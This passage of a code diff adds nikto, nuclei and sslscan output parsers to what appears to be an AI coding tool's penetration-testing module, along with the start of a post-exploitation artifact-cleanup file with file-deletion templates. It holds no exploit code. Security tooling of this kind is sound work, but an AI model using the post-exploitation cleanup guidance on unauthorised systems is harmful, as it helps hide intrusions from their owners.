+        const osvdb = finding.OSVDB ? `[OSVDB-${finding.OSVDB}] ` : ""
+        lines.push(`${osvdb}${finding.url}`)
+        lines.push(`  ${finding.msg}`)
+        lines.push("")
+      }
+    }
+
+    if (result.statistics) {
+      lines.push("-".repeat(50))
+      lines.push(`Items tested: ${result.statistics.itemsTested}`)
+      lines.push(`Items found: ${result.statistics.itemsFound}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize nikto results.
+   */
+  export function summarize(result: NiktoResult): string {
+    const osvdbCount = result.findings.filter(f => f.OSVDB).length
+    return `Nikto found ${result.findings.length} issue(s) on ${result.host}:${result.port}${osvdbCount > 0 ? ` (${osvdbCount} with OSVDB references)` : ""}`
+  }
+
+  /**
+   * Convert nikto findings to pentest findings.
+   */
+  export function toFindings(
+    result: NiktoResult,
+    sessionID: string,
+    scanID: string
+  ): Array<Omit<PentestTypes.Finding, "id" | "createdAt">> {
+    return result.findings.map(finding => {
+      // Determine severity based on content
+      let severity: PentestTypes.Severity = "info"
+      const msg = finding.msg.toLowerCase()
+
+      if (msg.includes("sql injection") || msg.includes("remote code") || msg.includes("command injection")) {
+        severity = "critical"
+      } else if (msg.includes("xss") || msg.includes("file inclusion") || msg.includes("directory traversal")) {
+        severity = "high"
+      } else if (finding.OSVDB || msg.includes("vulnerable") || msg.includes("outdated")) {
+        severity = "medium"
+      } else if (msg.includes("information") || msg.includes("disclosure") || msg.includes("header")) {
+        severity = "low"
+      }
+
+      return {
+        sessionID,
+        scanID,
+        title: finding.OSVDB ? `OSVDB-${finding.OSVDB}: ${finding.msg.slice(0, 60)}` : finding.msg.slice(0, 80),
+        description: finding.msg,
+        severity,
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "http",
+        evidence: `URL: ${finding.url}\nMethod: ${finding.method || "GET"}`,
+        references: finding.OSVDB ? [`https://osvdb.org/${finding.OSVDB}`] : undefined,
+      }
+    })
+  }
+}
diff --git a/packages/opencode/src/pentest/parsers/nuclei.ts b/packages/opencode/src/pentest/parsers/nuclei.ts
new file mode 100644
index 00000000000..3cd108d85b4
--- /dev/null
+++ b/packages/opencode/src/pentest/parsers/nuclei.ts
@@ -0,0 +1,274 @@
+/**
+ * @fileoverview Nuclei Output Parser
+ *
+ * Parses nuclei template-based vulnerability scanner output.
+ * Supports JSONL format (-json or -jsonl flag).
+ *
+ * @module pentest/parsers/nuclei
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "pentest.parser.nuclei" })
+
+/**
+ * Single nuclei finding from JSONL output.
+ */
+export const NucleiFinding = z.object({
+  template: z.string(),
+  "template-id": z.string(),
+  "template-path": z.string().optional(),
+  info: z.object({
+    name: z.string(),
+    author: z.array(z.string()).or(z.string()).optional(),
+    severity: z.enum(["info", "low", "medium", "high", "critical"]),
+    description: z.string().optional(),
+    reference: z.array(z.string()).optional(),
+    tags: z.array(z.string()).or(z.string()).optional(),
+    classification: z.object({
+      "cve-id": z.array(z.string()).optional(),
+      "cwe-id": z.array(z.string()).optional(),
+      "cvss-metrics": z.string().optional(),
+      "cvss-score": z.number().optional(),
+    }).optional(),
+  }),
+  type: z.string(),
+  host: z.string(),
+  matched: z.string().optional(),
+  "matched-at": z.string().optional(),
+  "extracted-results": z.array(z.string()).optional(),
+  ip: z.string().optional(),
+  timestamp: z.string(),
+  "curl-command": z.string().optional(),
+  "matcher-name": z.string().optional(),
+  "matcher-status": z.boolean().optional(),
+})
+export type NucleiFinding = z.infer<typeof NucleiFinding>
+
+/**
+ * Aggregated nuclei scan result.
+ */
+export const NucleiResult = z.object({
+  target: z.string(),
+  findings: z.array(NucleiFinding),
+  summary: z.object({
+    total: z.number(),
+    critical: z.number(),
+    high: z.number(),
+    medium: z.number(),
+    low: z.number(),
+    info: z.number(),
+  }),
+  startTime: z.number().optional(),
+  endTime: z.number().optional(),
+})
+export type NucleiResult = z.infer<typeof NucleiResult>
+
+export namespace NucleiParser {
+  /**
+   * Parse nuclei JSONL output into structured result.
+   *
+   * @param output - Raw nuclei output (JSONL format)
+   * @param target - Target URL or host
+   * @returns Parsed nuclei result
+   */
+  export function parse(output: string, target: string): NucleiResult {
+    const findings: NucleiFinding[] = []
+    const lines = output.split("\n").filter(line => line.trim())
+
+    let startTime: number | undefined
+    let endTime: number | undefined
+
+    for (const line of lines) {
+      try {
+        const json = JSON.parse(line)
+
+        // Skip non-finding lines (progress, stats, etc.)
+        if (!json["template-id"] && !json.template) {
+          continue
+        }
+
+        // Normalize the finding structure
+        const finding = normalizeFinding(json)
+        if (finding) {
+          findings.push(finding)
+
+          // Track timing
+          const ts = new Date(finding.timestamp).getTime()
+          if (!startTime || ts < startTime) startTime = ts
+          if (!endTime || ts > endTime) endTime = ts
+        }
+      } catch {
+        // Skip non-JSON lines (progress output, etc.)
+        continue
+      }
+    }
+
+    // Calculate summary
+    const summary = {
+      total: findings.length,
+      critical: findings.filter(f => f.info.severity === "critical").length,
+      high: findings.filter(f => f.info.severity === "high").length,
+      medium: findings.filter(f => f.info.severity === "medium").length,
+      low: findings.filter(f => f.info.severity === "low").length,
+      info: findings.filter(f => f.info.severity === "info").length,
+    }
+
+    return {
+      target,
+      findings,
+      summary,
+      startTime,
+      endTime,
+    }
+  }
+
+  /**
+   * Normalize a nuclei finding to consistent structure.
+   */
+  function normalizeFinding(json: any): NucleiFinding | null {
+    try {
+      return {
+        template: json.template || json["template-id"],
+        "template-id": json["template-id"] || json.template,
+        "template-path": json["template-path"],
+        info: {
+          name: json.info?.name || json.name || "Unknown",
+          author: json.info?.author,
+          severity: json.info?.severity || "info",
+          description: json.info?.description,
+          reference: Array.isArray(json.info?.reference) ? json.info.reference : json.info?.reference ? [json.info.reference] : undefined,
+          tags: json.info?.tags,
+          classification: json.info?.classification,
+        },
+        type: json.type || "http",
+        host: json.host || json.url || "",
+        matched: json.matched,
+        "matched-at": json["matched-at"] || json.url,
+        "extracted-results": json["extracted-results"],
+        ip: json.ip,
+        timestamp: json.timestamp || new Date().toISOString(),
+        "curl-command": json["curl-command"],
+        "matcher-name": json["matcher-name"],
+        "matcher-status": json["matcher-status"],
+      }
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Format nuclei result as human-readable text.
+   */
+  export function format(result: NucleiResult): string {
+    const lines: string[] = []
+
+    lines.push(`Nuclei Scan Results for ${result.target}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    // Summary
+    lines.push("SEVERITY SUMMARY")
+    lines.push("-".repeat(30))
+    if (result.summary.critical > 0) lines.push(`  Critical: ${result.summary.critical}`)
+    if (result.summary.high > 0) lines.push(`  High:     ${result.summary.high}`)
+    if (result.summary.medium > 0) lines.push(`  Medium:   ${result.summary.medium}`)
+    if (result.summary.low > 0) lines.push(`  Low:      ${result.summary.low}`)
+    if (result.summary.info > 0) lines.push(`  Info:     ${result.summary.info}`)
+    lines.push(`  Total:    ${result.summary.total}`)
+    lines.push("")
+
+    if (result.findings.length === 0) {
+      lines.push("No vulnerabilities detected.")
+      return lines.join("\n")
+    }
+
+    // Group by severity
+    const severityOrder: Array<"critical" | "high" | "medium" | "low" | "info"> = ["critical", "high", "medium", "low", "info"]
+
+    for (const severity of severityOrder) {
+      const findings = result.findings.filter(f => f.info.severity === severity)
+      if (findings.length === 0) continue
+
+      lines.push(`${severity.toUpperCase()} (${findings.length})`)
+      lines.push("-".repeat(50))
+
+      for (const finding of findings) {
+        lines.push(`[${finding["template-id"]}] ${finding.info.name}`)
+        lines.push(`  URL: ${finding["matched-at"] || finding.host}`)
+        if (finding.info.description) {
+          lines.push(`  Description: ${finding.info.description.slice(0, 100)}${finding.info.description.length > 100 ? "..." : ""}`)
+        }
+        if (finding.info.classification?.["cve-id"]?.length) {
+          lines.push(`  CVE: ${finding.info.classification["cve-id"].join(", ")}`)
+        }
+        lines.push("")
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize nuclei results.
+   */
+  export function summarize(result: NucleiResult): string {
+    const parts: string[] = [`Nuclei found ${result.summary.total} issue(s)`]
+
+    if (result.summary.critical > 0) parts.push(`${result.summary.critical} critical`)
+    if (result.summary.high > 0) parts.push(`${result.summary.high} high`)
+    if (result.summary.medium > 0) parts.push(`${result.summary.medium} medium`)
+
+    return parts.join(", ")
+  }
+
+  /**
+   * Convert nuclei findings to pentest findings.
+   */
+  export function toFindings(
+    result: NucleiResult,
+    sessionID: string,
+    scanID: string
+  ): Array<Omit<PentestTypes.Finding, "id" | "createdAt">> {
+    return result.findings.map(finding => ({
+      sessionID,
+      scanID,
+      title: `[${finding["template-id"]}] ${finding.info.name}`,
+      description: finding.info.description || `Nuclei template ${finding["template-id"]} matched`,
+      severity: finding.info.severity as PentestTypes.Severity,
+      status: "open",
+      target: extractHost(finding.host),
+      port: extractPort(finding.host),
+      protocol: "tcp",
+      service: finding.type === "http" || finding.type === "https" ? "http" : finding.type,
+      evidence: [
+        `Template: ${finding["template-id"]}`,
+        `Matched at: ${finding["matched-at"] || finding.host}`,
+        finding.matched ? `Matched: ${finding.matched}` : "",
+        finding["curl-command"] ? `Curl: ${finding["curl-command"]}` : "",
+      ].filter(Boolean).join("\n"),
+      references: finding.info.reference,
+      cve: finding.info.classification?.["cve-id"],
+    }))
+  }
+
+  function extractHost(url: string): string {
+    try {
+      return new URL(url).hostname
+    } catch {
+      return url.replace(/^https?:\/\//, "").split(/[:/]/)[0]
+    }
+  }
+
+  function extractPort(url: string): number {
+    try {
+      const u = new URL(url)
+      if (u.port) return parseInt(u.port, 10)
+      return u.protocol === "https:" ? 443 : 80
+    } catch {
+      return 80
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/parsers/sslscan.ts b/packages/opencode/src/pentest/parsers/sslscan.ts
new file mode 100644
index 00000000000..e212fc28a3a
--- /dev/null
+++ b/packages/opencode/src/pentest/parsers/sslscan.ts
@@ -0,0 +1,625 @@
+/**
+ * @fileoverview SSLScan Output Parser
+ *
+ * Parses sslscan TLS/SSL configuration scanner output.
+ * Supports both XML (--xml) and text output formats.
+ *
+ * @module pentest/parsers/sslscan
+ */
+
+import z from "zod"
+import { PentestTypes } from "../types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "pentest.parser.sslscan" })
+
+/**
+ * TLS/SSL protocol support info.
+ */
+export const ProtocolSupport = z.object({
+  name: z.string(),
+  version: z.string(),
+  enabled: z.boolean(),
+})
+export type ProtocolSupport = z.infer<typeof ProtocolSupport>
+
+/**
+ * Cipher suite info.
+ */
+export const CipherInfo = z.object({
+  protocol: z.string(),
+  cipher: z.string(),
+  bits: z.number(),
+  status: z.enum(["accepted", "preferred", "rejected"]),
+  strength: z.enum(["strong", "acceptable", "weak", "insecure"]).optional(),
+})
+export type CipherInfo = z.infer<typeof CipherInfo>
+
+/**
+ * Certificate info.
+ */
+export const CertificateInfo = z.object({
+  subject: z.string(),
+  issuer: z.string(),
+  altNames: z.array(z.string()).optional(),
+  validFrom: z.string().optional(),
+  validTo: z.string().optional(),
+  expired: z.boolean().optional(),
+  selfSigned: z.boolean().optional(),
+  signatureAlgorithm: z.string().optional(),
+  keyStrength: z.number().optional(),
+  keyType: z.string().optional(),
+})
+export type CertificateInfo = z.infer<typeof CertificateInfo>
+
+/**
+ * SSLScan result structure.
+ */
+export const SslscanResult = z.object({
+  target: z.string(),
+  host: z.string(),
+  port: z.number(),
+  protocols: z.array(ProtocolSupport),
+  ciphers: z.array(CipherInfo),
+  certificate: CertificateInfo.optional(),
+  vulnerabilities: z.object({
+    heartbleed: z.boolean().optional(),
+    poodle: z.boolean().optional(),
+    beast: z.boolean().optional(),
+    crime: z.boolean().optional(),
+    drown: z.boolean().optional(),
+    logjam: z.boolean().optional(),
+    freak: z.boolean().optional(),
+    robotAttack: z.boolean().optional(),
+    ticketbleed: z.boolean().optional(),
+  }).optional(),
+  compression: z.boolean().optional(),
+  fallbackScsv: z.boolean().optional(),
+  secureRenegotiation: z.boolean().optional(),
+})
+export type SslscanResult = z.infer<typeof SslscanResult>
+
+export namespace SslscanParser {
+  /**
+   * Parse sslscan output into structured result.
+   *
+   * @param output - Raw sslscan output (XML or text)
+   * @param target - Target host
+   * @returns Parsed sslscan result
+   */
+  export function parse(output: string, target: string): SslscanResult {
+    // Try XML parsing first
+    if (output.includes("<?xml") || output.includes("<document>")) {
+      return parseXml(output, target)
+    }
+
+    return parseText(output, target)
+  }
+
+  /**
+   * Parse sslscan XML output.
+   */
+  function parseXml(xml: string, target: string): SslscanResult {
+    const protocols: ProtocolSupport[] = []
+    const ciphers: CipherInfo[] = []
+    const vulnerabilities: SslscanResult["vulnerabilities"] = {}
+
+    // Extract host and port
+    const hostMatch = xml.match(/host="([^"]+)"/)
+    const portMatch = xml.match(/port="(\d+)"/)
+    const host = hostMatch?.[1] || extractHost(target)
+    const port = portMatch ? parseInt(portMatch[1], 10) : extractPort(target)
+
+    // Parse protocols
+    const sslv2Match = xml.match(/sslv2\s+enabled="(\d)"/)
+    if (sslv2Match) {
+      protocols.push({ name: "SSL", version: "2.0", enabled: sslv2Match[1] === "1" })
+    }
+
+    const sslv3Match = xml.match(/sslv3\s+enabled="(\d)"/)
+    if (sslv3Match) {
+      protocols.push({ name: "SSL", version: "3.0", enabled: sslv3Match[1] === "1" })
+    }
+
+    const tls10Match = xml.match(/tlsv1_0\s+enabled="(\d)"/)
+    if (tls10Match) {
+      protocols.push({ name: "TLS", version: "1.0", enabled: tls10Match[1] === "1" })
+    }
+
+    const tls11Match = xml.match(/tlsv1_1\s+enabled="(\d)"/)
+    if (tls11Match) {
+      protocols.push({ name: "TLS", version: "1.1", enabled: tls11Match[1] === "1" })
+    }
+
+    const tls12Match = xml.match(/tlsv1_2\s+enabled="(\d)"/)
+    if (tls12Match) {
+      protocols.push({ name: "TLS", version: "1.2", enabled: tls12Match[1] === "1" })
+    }
+
+    const tls13Match = xml.match(/tlsv1_3\s+enabled="(\d)"/)
+    if (tls13Match) {
+      protocols.push({ name: "TLS", version: "1.3", enabled: tls13Match[1] === "1" })
+    }
+
+    // Parse ciphers
+    const cipherMatches = xml.matchAll(/<cipher[^>]*status="([^"]+)"[^>]*sslversion="([^"]+)"[^>]*bits="(\d+)"[^>]*cipher="([^"]+)"[^>]*\/>/g)
+    for (const match of cipherMatches) {
+      ciphers.push({
+        status: match[1] as CipherInfo["status"],
+        protocol: match[2],
+        bits: parseInt(match[3], 10),
+        cipher: match[4],
+        strength: getCipherStrength(match[4], parseInt(match[3], 10)),
+      })
+    }
+
+    // Parse vulnerabilities
+    const heartbleedMatch = xml.match(/heartbleed\s+vulnerable="(\d)"/)
+    if (heartbleedMatch) vulnerabilities.heartbleed = heartbleedMatch[1] === "1"
+
+    // Parse certificate
+    let certificate: CertificateInfo | undefined
+    const certMatch = xml.match(/<certificate[^>]*>([\s\S]*?)<\/certificate>/)
+    if (certMatch) {
+      certificate = parseCertificateXml(certMatch[1])
+    }
+
+    return {
+      target,
+      host,
+      port,
+      protocols,
+      ciphers,
+      certificate,
+      vulnerabilities: Object.keys(vulnerabilities).length > 0 ? vulnerabilities : undefined,
+    }
+  }
+
+  /**
+   * Parse certificate from XML.
+   */
+  function parseCertificateXml(xml: string): CertificateInfo {
+    const subjectMatch = xml.match(/subject="([^"]*)"/) || xml.match(/<subject>([^<]*)<\/subject>/)
+    const issuerMatch = xml.match(/issuer="([^"]*)"/) || xml.match(/<issuer>([^<]*)<\/issuer>/)
+    const notBeforeMatch = xml.match(/not-valid-before="([^"]*)"/)
+    const notAfterMatch = xml.match(/not-valid-after="([^"]*)"/)
+    const expiredMatch = xml.match(/expired="(\d)"/)
+    const selfSignedMatch = xml.match(/self-signed="(\d)"/)
+    const sigAlgMatch = xml.match(/signature-algorithm="([^"]*)"/)
+
+    return {
+      subject: subjectMatch?.[1] || "Unknown",
+      issuer: issuerMatch?.[1] || "Unknown",
+      validFrom: notBeforeMatch?.[1],
+      validTo: notAfterMatch?.[1],
+      expired: expiredMatch ? expiredMatch[1] === "1" : undefined,
+      selfSigned: selfSignedMatch ? selfSignedMatch[1] === "1" : undefined,
+      signatureAlgorithm: sigAlgMatch?.[1],
+    }
+  }
+
+  /**
+   * Parse sslscan text output.
+   */
+  function parseText(output: string, target: string): SslscanResult {
+    const protocols: ProtocolSupport[] = []
+    const ciphers: CipherInfo[] = []
+    const vulnerabilities: SslscanResult["vulnerabilities"] = {}
+    const lines = output.split("\n")
+
+    let host = extractHost(target)
+    let port = extractPort(target)
+    let certificate: CertificateInfo | undefined
+
+    let inCertSection = false
+    let certLines: string[] = []
+
+    for (const line of lines) {
+      // Extract target info
+      const targetMatch = line.match(/Testing SSL server (\S+) on port (\d+)/)
+      if (targetMatch) {
+        host = targetMatch[1]
+        port = parseInt(targetMatch[2], 10)
+        continue
+      }
+
+      // Parse protocol support
+      if (line.includes("SSLv2") && line.includes("enabled")) {
+        protocols.push({ name: "SSL", version: "2.0", enabled: true })
+      } else if (line.includes("SSLv2") && line.includes("disabled")) {
+        protocols.push({ name: "SSL", version: "2.0", enabled: false })
+      }
+
+      if (line.includes("SSLv3") && line.includes("enabled")) {
+        protocols.push({ name: "SSL", version: "3.0", enabled: true })
+      } else if (line.includes("SSLv3") && line.includes("disabled")) {
+        protocols.push({ name: "SSL", version: "3.0", enabled: false })
+      }
+
+      if (line.includes("TLSv1.0") && line.includes("enabled")) {
+        protocols.push({ name: "TLS", version: "1.0", enabled: true })
+      } else if (line.includes("TLSv1.0") && line.includes("disabled")) {
+        protocols.push({ name: "TLS", version: "1.0", enabled: false })
+      }
+
+      if (line.includes("TLSv1.1") && line.includes("enabled")) {
+        protocols.push({ name: "TLS", version: "1.1", enabled: true })
+      } else if (line.includes("TLSv1.1") && line.includes("disabled")) {
+        protocols.push({ name: "TLS", version: "1.1", enabled: false })
+      }
+
+      if (line.includes("TLSv1.2") && line.includes("enabled")) {
+        protocols.push({ name: "TLS", version: "1.2", enabled: true })
+      } else if (line.includes("TLSv1.2") && line.includes("disabled")) {
+        protocols.push({ name: "TLS", version: "1.2", enabled: false })
+      }
+
+      if (line.includes("TLSv1.3") && line.includes("enabled")) {
+        protocols.push({ name: "TLS", version: "1.3", enabled: true })
+      } else if (line.includes("TLSv1.3") && line.includes("disabled")) {
+        protocols.push({ name: "TLS", version: "1.3", enabled: false })
+      }
+
+      // Parse cipher lines
+      const cipherMatch = line.match(/^\s*(Accepted|Preferred)\s+(TLSv\S+|SSLv\S+)\s+(\d+)\s+bits\s+(\S+)/)
+      if (cipherMatch) {
+        ciphers.push({
+          status: cipherMatch[1].toLowerCase() as "accepted" | "preferred",
+          protocol: cipherMatch[2],
+          bits: parseInt(cipherMatch[3], 10),
+          cipher: cipherMatch[4],
+          strength: getCipherStrength(cipherMatch[4], parseInt(cipherMatch[3], 10)),
+        })
+      }
+
+      // Parse vulnerabilities
+      if (line.includes("Heartbleed") && line.includes("vulnerable")) {
+        vulnerabilities.heartbleed = true
+      }
+      if (line.includes("POODLE") && line.includes("vulnerable")) {
+        vulnerabilities.poodle = true
+      }
+
+      // Certificate section
+      if (line.includes("SSL Certificate:") || line.includes("Certificate:")) {
+        inCertSection = true
+        continue
+      }
+      if (inCertSection && line.trim() === "") {
+        inCertSection = false
+        certificate = parseCertificateText(certLines)
+        certLines = []
+        continue
+      }
+      if (inCertSection) {
+        certLines.push(line)
+      }
+    }
+
+    return {
+      target,
+      host,
+      port,
+      protocols,
+      ciphers,
+      certificate,
+      vulnerabilities: Object.keys(vulnerabilities).length > 0 ? vulnerabilities : undefined,
+    }
+  }
+
+  /**
+   * Parse certificate from text lines.
+   */
+  function parseCertificateText(lines: string[]): CertificateInfo {
+    let subject = "Unknown"
+    let issuer = "Unknown"
+    let validFrom: string | undefined
+    let validTo: string | undefined
+    let expired: boolean | undefined
+    let selfSigned: boolean | undefined
+
+    for (const line of lines) {
+      if (line.includes("Subject:")) {
+        subject = line.split("Subject:")[1]?.trim() || subject
+      }
+      if (line.includes("Issuer:")) {
+        issuer = line.split("Issuer:")[1]?.trim() || issuer
+      }
+      if (line.includes("Not valid before:")) {
+        validFrom = line.split("Not valid before:")[1]?.trim()
+      }
+      if (line.includes("Not valid after:")) {
+        validTo = line.split("Not valid after:")[1]?.trim()
+      }
+      if (line.includes("Certificate has expired")) {
+        expired = true
+      }
+      if (line.includes("Self-signed")) {
+        selfSigned = true
+      }
+    }
+
+    return { subject, issuer, validFrom, validTo, expired, selfSigned }
+  }
+
+  /**
+   * Determine cipher strength.
+   */
+  function getCipherStrength(cipher: string, bits: number): CipherInfo["strength"] {
+    // Weak ciphers
+    if (cipher.includes("NULL") || cipher.includes("EXPORT") || cipher.includes("anon")) {
+      return "insecure"
+    }
+    if (cipher.includes("RC4") || cipher.includes("DES") || cipher.includes("MD5")) {
+      return "weak"
+    }
+    if (bits < 128) {
+      return "weak"
+    }
+
+    // Strong ciphers
+    if (cipher.includes("GCM") || cipher.includes("CHACHA20") || bits >= 256) {
+      return "strong"
+    }
+
+    return "acceptable"
+  }
+
+  /**
+   * Format sslscan result as human-readable text.
+   */
+  export function format(result: SslscanResult): string {
+    const lines: string[] = []
+
+    lines.push(`SSL/TLS Scan Results for ${result.host}:${result.port}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    // Protocol support
+    lines.push("PROTOCOL SUPPORT")
+    lines.push("-".repeat(30))
+    for (const proto of result.protocols) {
+      const status = proto.enabled ? "ENABLED" : "disabled"
+      const warning = (proto.name === "SSL" || (proto.name === "TLS" && parseFloat(proto.version) < 1.2)) && proto.enabled ? " ⚠️" : ""
+      lines.push(`  ${proto.name} ${proto.version}: ${status}${warning}`)
+    }
+    lines.push("")
+
+    // Cipher summary
+    if (result.ciphers.length > 0) {
+      lines.push("CIPHER SUITES")
+      lines.push("-".repeat(30))
+
+      const weak = result.ciphers.filter(c => c.strength === "weak" || c.strength === "insecure")
+      const strong = result.ciphers.filter(c => c.strength === "strong")
+
+      lines.push(`  Strong: ${strong.length}`)
+      lines.push(`  Weak/Insecure: ${weak.length}`)
+      lines.push(`  Total: ${result.ciphers.length}`)
+
+      if (weak.length > 0) {
+        lines.push("")
+        lines.push("  WEAK CIPHERS:")
+        for (const cipher of weak.slice(0, 10)) {
+          lines.push(`    ${cipher.protocol} ${cipher.cipher} (${cipher.bits} bits)`)
+        }
+        if (weak.length > 10) {
+          lines.push(`    ... and ${weak.length - 10} more`)
+        }
+      }
+      lines.push("")
+    }
+
+    // Vulnerabilities
+    if (result.vulnerabilities) {
+      const vulns = Object.entries(result.vulnerabilities).filter(([_, v]) => v)
+      if (vulns.length > 0) {
+        lines.push("VULNERABILITIES")
+        lines.push("-".repeat(30))
+        for (const [name, _] of vulns) {
+          lines.push(`  ⚠️  ${name.toUpperCase()} - VULNERABLE`)
+        }
+        lines.push("")
+      }
+    }
+
+    // Certificate
+    if (result.certificate) {
+      lines.push("CERTIFICATE")
+      lines.push("-".repeat(30))
+      lines.push(`  Subject: ${result.certificate.subject}`)
+      lines.push(`  Issuer: ${result.certificate.issuer}`)
+      if (result.certificate.validFrom) {
+        lines.push(`  Valid from: ${result.certificate.validFrom}`)
+      }
+      if (result.certificate.validTo) {
+        lines.push(`  Valid until: ${result.certificate.validTo}`)
+      }
+      if (result.certificate.expired) {
+        lines.push("  ⚠️  CERTIFICATE EXPIRED")
+      }
+      if (result.certificate.selfSigned) {
+        lines.push("  ⚠️  Self-signed certificate")
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Summarize sslscan results.
+   */
+  export function summarize(result: SslscanResult): string {
+    const issues: string[] = []
+
+    // Check deprecated protocols
+    const deprecatedEnabled = result.protocols.filter(
+      p => p.enabled && (p.name === "SSL" || (p.name === "TLS" && parseFloat(p.version) < 1.2))
+    )
+    if (deprecatedEnabled.length > 0) {
+      issues.push(`${deprecatedEnabled.length} deprecated protocol(s)`)
+    }
+
+    // Check weak ciphers
+    const weakCiphers = result.ciphers.filter(c => c.strength === "weak" || c.strength === "insecure")
+    if (weakCiphers.length > 0) {
+      issues.push(`${weakCiphers.length} weak cipher(s)`)
+    }
+
+    // Check vulnerabilities
+    if (result.vulnerabilities) {
+      const vulnCount = Object.values(result.vulnerabilities).filter(v => v).length
+      if (vulnCount > 0) {
+        issues.push(`${vulnCount} vulnerability(ies)`)
+      }
+    }
+
+    if (issues.length === 0) {
+      return `SSL/TLS configuration for ${result.host}:${result.port} looks secure`
+    }
+
+    return `SSL/TLS scan found issues: ${issues.join(", ")}`
+  }
+
+  /**
+   * Convert sslscan results to pentest findings.
+   */
+  export function toFindings(
+    result: SslscanResult,
+    sessionID: string,
+    scanID: string
+  ): Array<Omit<PentestTypes.Finding, "id" | "createdAt">> {
+    const findings: Array<Omit<PentestTypes.Finding, "id" | "createdAt">> = []
+
+    // Deprecated protocols
+    const deprecatedProtocols = result.protocols.filter(
+      p => p.enabled && (p.name === "SSL" || (p.name === "TLS" && parseFloat(p.version) < 1.2))
+    )
+    if (deprecatedProtocols.length > 0) {
+      const protoNames = deprecatedProtocols.map(p => `${p.name}v${p.version}`).join(", ")
+      findings.push({
+        sessionID,
+        scanID,
+        title: "Deprecated SSL/TLS Protocol(s) Enabled",
+        description: `The server supports deprecated protocol(s): ${protoNames}. These protocols have known vulnerabilities and should be disabled.`,
+        severity: deprecatedProtocols.some(p => p.name === "SSL") ? "high" : "medium",
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "https",
+        evidence: `Deprecated protocols enabled:\n${protoNames}`,
+        remediation: "Disable SSLv2, SSLv3, TLSv1.0, and TLSv1.1. Configure the server to only support TLSv1.2 and TLSv1.3.",
+      })
+    }
+
+    // Weak ciphers
+    const weakCiphers = result.ciphers.filter(c => c.strength === "weak" || c.strength === "insecure")
+    if (weakCiphers.length > 0) {
+      const insecure = weakCiphers.filter(c => c.strength === "insecure")
+      findings.push({
+        sessionID,
+        scanID,
+        title: `${insecure.length > 0 ? "Insecure" : "Weak"} Cipher Suite(s) Supported`,
+        description: `The server supports ${weakCiphers.length} weak or insecure cipher suite(s).`,
+        severity: insecure.length > 0 ? "high" : "medium",
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "https",
+        evidence: `Weak ciphers:\n${weakCiphers.slice(0, 10).map(c => `  ${c.cipher} (${c.bits} bits)`).join("\n")}`,
+        remediation: "Configure the server to only use strong cipher suites with AES-GCM or ChaCha20-Poly1305.",
+      })
+    }
+
+    // Vulnerabilities
+    if (result.vulnerabilities?.heartbleed) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "Heartbleed Vulnerability (CVE-2014-0160)",
+        description: "The server is vulnerable to the Heartbleed bug, which allows attackers to read sensitive memory.",
+        severity: "critical",
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "https",
+        evidence: "Heartbleed vulnerability detected",
+        remediation: "Update OpenSSL to a patched version and regenerate SSL certificates.",
+        cve: ["CVE-2014-0160"],
+      })
+    }
+
+    if (result.vulnerabilities?.poodle) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "POODLE Vulnerability (CVE-2014-3566)",
+        description: "The server is vulnerable to the POODLE attack against SSLv3.",
+        severity: "medium",
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "https",
+        evidence: "POODLE vulnerability detected",
+        remediation: "Disable SSLv3 on the server.",
+        cve: ["CVE-2014-3566"],
+      })
+    }
+
+    // Expired certificate
+    if (result.certificate?.expired) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "SSL Certificate Expired",
+        description: "The SSL certificate has expired.",
+        severity: "high",
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "https",
+        evidence: `Certificate expired on: ${result.certificate.validTo}`,
+        remediation: "Renew the SSL certificate.",
+      })
+    }
+
+    // Self-signed certificate
+    if (result.certificate?.selfSigned) {
+      findings.push({
+        sessionID,
+        scanID,
+        title: "Self-Signed SSL Certificate",
+        description: "The server uses a self-signed certificate which is not trusted by default.",
+        severity: "low",
+        status: "open",
+        target: result.host,
+        port: result.port,
+        protocol: "tcp",
+        service: "https",
+        evidence: "Self-signed certificate detected",
+        remediation: "Obtain a certificate from a trusted Certificate Authority.",
+      })
+    }
+
+    return findings
+  }
+
+  function extractHost(target: string): string {
+    return target.replace(/^https?:\/\//, "").split(/[:/]/)[0]
+  }
+
+  function extractPort(target: string): number {
+    try {
+      const u = new URL(target.includes("://") ? target : `https://${target}`)
+      if (u.port) return parseInt(u.port, 10)
+      return u.protocol === "https:" ? 443 : 80
+    } catch {
+      return 443
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/cleanup/artifacts.ts b/packages/opencode/src/pentest/postexploit/cleanup/artifacts.ts
new file mode 100644
index 00000000000..f7a72b26d63
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/cleanup/artifacts.ts
@@ -0,0 +1,260 @@
+/**
+ * @fileoverview Artifact Tracking
+ *
+ * Provides tracking and cleanup guidance for artifacts created
+ * during post-exploitation activities.
+ *
+ * @module pentest/postexploit/cleanup/artifacts
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Artifact tracking namespace.
+ */
+export namespace ArtifactTracking {
+  /**
+   * Artifact cleanup templates by type.
+   */
+  export const CLEANUP_TEMPLATES: Record<PostExploitTypes.ArtifactType, {
+    linux: { cleanup: string; verify: string }
+    windows: { cleanup: string; verify: string }
+  }> = {
+    file: {
+      linux: {
+        cleanup: "rm -f <path>",
+        verify: "ls -la <path> 2>&1 | grep -q 'No such file'",
+      },
+      windows: {
+        cleanup: "del /f /q <path>",
